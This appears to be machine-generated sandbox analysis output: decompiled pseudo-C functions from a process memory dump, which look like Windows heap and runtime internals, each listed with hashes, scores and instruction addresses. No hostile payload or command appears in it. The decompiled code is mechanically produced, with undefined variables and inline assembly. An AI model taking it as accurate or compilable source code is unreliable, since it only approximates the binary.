Instruction ID: 001bbaa2e1b9bbbba9ff7f1c7191ef23eba82b50aac5eaf996ba378e84afa13e
Opcode Fuzzy Hash: 8652555e942c159e04b6c9638ea47248f7765b9d6b15a898915ed11461cca169
Instruction Fuzzy Hash: 3F21D372504B449FD311DF2DC944B6BBBECEF91680F0D086BB9509F261D738C509C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 034F070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E034F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E034F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E034EAFDE( &_v8,  &_v12);
					E034F1293(_t38, _v28, _t60);
					if(E03447D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E034E14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x034f071b
0x034f0724
0x034f0734
0x034f0738
0x034f074b
0x034f074b
0x034f0753
0x034f0753
0x034f0759
0x034f075d
0x034f0774
0x034f0779
0x034f077d
0x034f0789
0x034f0795
0x034f07a7
0x034f0797
0x034f07a0
0x034f07a0
0x034f07af
0x034f07c4
0x034f07cd
0x034f07cd
0x034f07af
0x034f07dc

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 2788833dad75526d8694d22a5ea99081514ad6583dfa6e292378a64511367cec
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: BB21F23A2042009FD715DF18C880B6ABBE5EFC4350F08856EFA959F392D730D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 034A7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E034A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3517b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0346F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03447D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03469AE0();
					_t24 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x034a7799
0x034a779a
0x034a779b
0x034a77a3
0x034a77ab
0x034a77ae
0x034a77b1
0x034a77b1
0x034a77bf
0x034a77c4
0x034a77c8
0x034a77ce
0x034a77d4
0x034a77e0
0x034a77e0
0x034a77d6
0x034a77d6
0x034a77de
0x00000000
0x00000000
0x034a77de
0x034a77e5
0x034a77f0
0x034a77f3
0x034a77f6
0x034a77fd
0x034a7800
0x034a780c
0x034a7818
0x034a782b
0x034a781a
0x034a7823
0x034a7823
0x034a7830
0x034a7831
0x034a7838
0x034a783d
0x034a783e
0x034a784f
0x034a784f
0x034a785a

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e4d6d6c26a679deafba7aabcd508a86e56432dfeab01da51b2e2bf17661324
Instruction ID: ec96fdbd9ca911dc31a72fa8a018816837bad66ce32a937a78521e7dba0336eb
Opcode Fuzzy Hash: e7e4d6d6c26a679deafba7aabcd508a86e56432dfeab01da51b2e2bf17661324
Instruction Fuzzy Hash: CE219F76500A04AFC725DFA9D880E6BBBA9EF48740F14056EE50ACB750D734E900CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0344AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0344AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03447D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03447D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03447D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03447D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E034A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0344ae78
0x0344ae7c
0x0344ae7e
0x0344ae81
0x0344ae86
0x0344ae8d
0x03492691
0x0344ae93
0x0344ae93
0x0344ae93
0x0344ae98
0x0344ae9d
0x034926a2
0x034926b4
0x034926a4
0x034926ad
0x034926ad
0x034926b9
0x00000000
0x034926bb
0x00000000
0x034926bb
0x0344aea3
0x0344aea3
0x0344aea3
0x0344aeaa
0x034926c0
0x034926c9
0x034926c9
0x0344aeb3
0x034926d4
0x034926e1
0x00000000
0x00000000
0x034926e7
0x034926ee
0x034926f0
0x034926f9
0x034926f9
0x03492702
0x03492708
0x03492708
0x0349270b
0x0349270f
0x03492711
0x03492711
0x03492725
0x03492725
0x00000000
0x0344aeb9
0x0344aeb9
0x0344aebf
0x0344aebf
0x0344aeb3

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: a6938cbffc5c75e94cacda8ea1bef86544c386c6fc18b45e75dca848c587ecc5
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 3021F271A41684AFFB21DB69C944B267BE8AF44240F1D04F3DD148F7A2D774DC41C698

Uniqueness

Uniqueness Score: -1.00%

Function 0345FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0345FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E034376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0345fd9b
0x0345fda0
0x0345fda1
0x0345fdab
0x0345fdad
0x0345fdb0
0x0345fdb8
0x0345fe0f
0x0345fde6
0x0345fde9
0x0345fdec
0x0349c0c0
0x0345fdfe
0x0345fe06
0x0345fe06
0x0349c0c8
0x0345fe2d
0x0345fe2d
0x00000000
0x0345fe2d
0x0349c0d1
0x0349c0e0
0x0349c0e5
0x0349c0e5
0x0349c0e8
0x00000000
0x0349c0e8
0x0345fdf4
0x00000000
0x00000000
0x0345fdf6
0x0345fdfa
0x0345fe1a
0x0345fe1f
0x0345fe1f
0x0345fdfc
0x00000000
0x0345fdfc
0x0345fdcc
0x0345fdd0
0x0345fe26
0x00000000
0x0345fe26
0x0345fdd8
0x0345fddb
0x0345fddd
0x0345fde0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 294b577b11c4a949ec76869fc3fa711532a00ecfab6fcd4c888de5bfd026340c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 9D216A72A40640DFD731CF4AC640A66F7E9EB94A10F29857FE9468FB12D730AC09CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0345B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0345B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03442280(_t12, 0x3518608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E034600C2(0x3518608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0345b395
0x0345b3a2
0x0345b3a5
0x0345b3aa
0x0345b3b2
0x0345b3ba
0x0345b3bd
0x0345b3c0
0x0345b3c4
0x0345b3c9
0x0349a3e9
0x0349a3ed
0x0349a3f0
0x0349a3ff
0x0349a403
0x0349a409
0x00000000
0x00000000
0x0349a40b
0x0349a40b
0x0349a40f
0x0349a415
0x0349a423
0x0349a423
0x0349a415
0x0345b3d1
0x0345b3e8
0x0345b3e8
0x0345b3d9

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5dcf15a335fadc28cf8564759c26f79e864dc7f2dc82946354744f5b47eb3a
Instruction ID: 32f07cacd8fe4b38f33f2c0b475ed524de8d78a8b3d32af9052ea47da35c58de
Opcode Fuzzy Hash: ad5dcf15a335fadc28cf8564759c26f79e864dc7f2dc82946354744f5b47eb3a
Instruction Fuzzy Hash: 0711AF377111149FDB29CA159D4052B769AFBD5330B28013FED16DF390C9315C02C2D8

Uniqueness

Uniqueness Score: -1.00%

Function 03429240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03429240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x34ff708);
				E0347D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E034695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E034695D0();
				_t33 =  *0x35184c4; // 0x0
				L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x35184c4; // 0x0
				L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x35184c4; // 0x0
				E03442280(L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x35186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E034695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E034695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03429325();
					_t50 =  *0x35184c4; // 0x0
					return E0347D0D1(L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x03429240
0x03429242
0x03429247
0x0342924c
0x0342924e
0x03429255
0x03429257
0x0342925a
0x0342925f
0x0342925f
0x03429266
0x03429271
0x03429276
0x03429279
0x0342927e
0x03429295
0x0342929a
0x034292b1
0x034292b6
0x034292d7
0x034292dc
0x034292e0
0x034292e6
0x034292e8
0x034292ee
0x03429332
0x03429333
0x03429337
0x03429338
0x0342933a
0x0342933a
0x0342933d
0x03429342
0x03429342
0x03429345
0x03429349
0x0342934e
0x03429352
0x03429357
0x034292f4
0x034292f4
0x034292f6
0x034292f9
0x03429300
0x03429306
0x03429324
0x03429324

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea4685400cc2a8a61eb886de9d1f4dd21c075b2daabfbb1af504582defd89716
Instruction ID: b000085a8e11df084f2b29da7baa02d46053f83230d2485192464221e3269df6
Opcode Fuzzy Hash: ea4685400cc2a8a61eb886de9d1f4dd21c075b2daabfbb1af504582defd89716
Instruction Fuzzy Hash: A2215936450700DFC721EF29CA40F5ABBB9BF08704F54496EE1099E6A2CB74E956DB88

Uniqueness

Uniqueness Score: -1.00%

Function 034B4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E034B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x35008d0);
				E0347D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E034B41E8(__ebx, __edi, __ecx, _t39);
				E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x35187e4;
					_t18 =  *0x35187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3515cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x35187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x35187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03427055(_t31 + 0xfffffff8);
								_t24 =  *0x35187e0; // 0x0
								_t18 = _t24 - 1;
								 *0x35187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3515cd0;
				if( *0x3515cd0 <= 0) {
					L03427055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x35187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x35187e8 = _t30;
						 *0x35187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0347D0D1(L034B4320());
			}

0x034b4257
0x034b4257
0x034b4257
0x034b4259
0x034b425e
0x034b4263
0x034b4265
0x034b4273
0x034b4278
0x034b427c
0x034b427f
0x034b4281
0x034b4287
0x034b42d7
0x034b42d7
0x034b42da
0x034b428d
0x034b428d
0x034b428f
0x034b4292
0x034b4297
0x034b429c
0x034b42a0
0x034b42a6
0x034b42a8
0x034b42ae
0x034b42b3
0x00000000
0x034b42ba
0x034b42ba
0x034b42bf
0x034b42c5
0x034b42ca
0x034b42cf
0x034b42d0
0x00000000
0x034b42d0
0x034b42b3
0x00000000
0x034b42a6
0x034b429c
0x034b42dc
0x034b42dc
0x034b42e3
0x034b4309
0x034b42e5
0x034b42e5
0x034b42e8
0x034b42ee
0x034b42f0
0x00000000
0x034b42f2
0x034b42f2
0x034b42f4
0x034b42f7
0x034b42f9
0x034b4300
0x034b4300
0x034b42f0
0x034b430e
0x034b431f

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d962c253f29a891572b72ff21650345b874d059787ecc2c11d9ee0578db09860
Instruction ID: 30b2faeb74959ec258ea8f4213940361ad4083e84f0500f57ce2736c2f95d8c7
Opcode Fuzzy Hash: d962c253f29a891572b72ff21650345b874d059787ecc2c11d9ee0578db09860
Instruction Fuzzy Hash: 90219F75901710CFC729EF26D040A94BBF0FB86394B5881AFC1958F3A6D732C486EB68

Uniqueness

Uniqueness Score: -1.00%

Function 03452397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E03452397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x351848c != 0) {
					L0344FAD0(0x3518610);
					if( *0x351848c == 0) {
						E0344FA00(0x3518610, _t19, _t27, 0x3518610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03452581(0x3518610, 0x34050a0, _t26, _t27, _t28);
						E0344FA00(0x3518610, 0x34050a0, _t27, 0x3518610);
					}
				} else {
					L1:
					_t11 =  *0x3518614; // 0x0
					if(_t11 == 0) {
						_t11 = E03464886(0x3401088, 1, 0x3518614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03452581(0x3518610, (_t11 << 4) + 0x3405070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x034523b0
0x034523b6
0x03452409
0x03452415
0x03495ae9
0x00000000
0x0345241b
0x0345241b
0x0345241d
0x03452427
0x0345242e
0x03452430
0x03452430
0x034523b8
0x034523b8
0x034523b8
0x034523bf
0x034523fc
0x034523fc
0x034523c1
0x034523c3
0x034523d0
0x034523d8
0x034523d8
0x034523dc
0x034523de
0x034523e1
0x034523e1
0x034523ec

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c3312c114161ec36580df7ba3e22235a93f6f8f754ab1f759ec058edc99f28
Instruction ID: 2fcdd144f46bb3ca9bed008a03a8a44073575760038f3892577bd00f3bc05146
Opcode Fuzzy Hash: e8c3312c114161ec36580df7ba3e22235a93f6f8f754ab1f759ec058edc99f28
Instruction Fuzzy Hash: B511DF31B043046FE730EA3AAC84F16B6D9EBA0650F18486BFD01AF292C7F4E845975C

Uniqueness

Uniqueness Score: -1.00%

Function 034A46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E034A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0346F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0345D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L034477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x034a46b7
0x034a46ba
0x034a46c5
0x034a46c8
0x034a46d0
0x034a46d4
0x034a46e6
0x034a46e9
0x034a46f4
0x034a46ff
0x034a4705
0x034a4706
0x034a470c
0x034a4713
0x034a471b
0x034a4723
0x034a4725
0x034a46d6
0x034a46d9
0x034a46db
0x034a46db
0x034a4732

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 6fbe5ccebc9c907e1d94f2d0eeed6c2867c692c30aceabdd06a5d5ad46afa010
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 97110276904208BFC701DF5E98808BEBBB9EF95300F1080AEF9848F350DA318D55C3A9

Uniqueness

Uniqueness Score: -1.00%

Function 034637F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E034637F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03442280(_t6, 0x3518550);
				}
				_t29 = E0346387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0343FFB0(0x3518550, _t27, 0x3518550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x034637fa
0x034637fc
0x03463805
0x03463808
0x03463808
0x03463814
0x03463818
0x03463846
0x03463848
0x0346384b
0x0346384b
0x03463852
0x00000000
0x03463854
0x03463856
0x00000000
0x00000000
0x03463863
0x00000000
0x03463863
0x0346381a
0x0346381a
0x0346381f
0x0346386e
0x0346386e
0x03463871
0x03463873
0x03463873
0x03463868
0x00000000
0x03463868
